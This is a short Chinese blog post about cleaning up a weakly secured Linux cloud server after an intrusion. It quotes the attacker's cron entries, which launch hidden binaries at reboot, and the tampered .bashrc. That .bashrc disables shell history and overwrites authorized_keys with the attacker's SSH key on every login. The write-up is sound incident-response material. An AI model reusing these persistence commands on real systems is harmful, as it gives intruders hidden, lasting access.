技术初心

Linux服务器被入侵

2019-08-05  本文已影响0人  virct

起因

今天登录自己的云服务器,发现一个进程Cpu占用100%,使用top命令后发现是cron进程干的。遂Kill -9该进程。由于服务器密码使用了两位数的弱密码因此服务器被hack也是情理之中。

问题排查

检查crontab发现一些异常的任务,似乎就是这些任务不停的消耗着计算机的资源

sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1

删除掉相应目录,检查syslog未发现其他异常,但是原来的ssh无法免密登录,之后发现.ssh / authorized_keys中原来的公钥被篡改,但是每次设置完之后重新登录还是登录不上,最后发现该用户的.bashrc被篡改为

set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~

这样每次用户登录就会将ssh更改为hacker的公钥,hacker就能随意访问你的服务器了。

安排

这台服务器是个人平时用来写代码的,因此没有什么重要信息,如果是生产环境的话建议更加详细的排查,经过上面的修复之后系统看起来运行正常中

上一篇 下一篇

猜你喜欢

热点阅读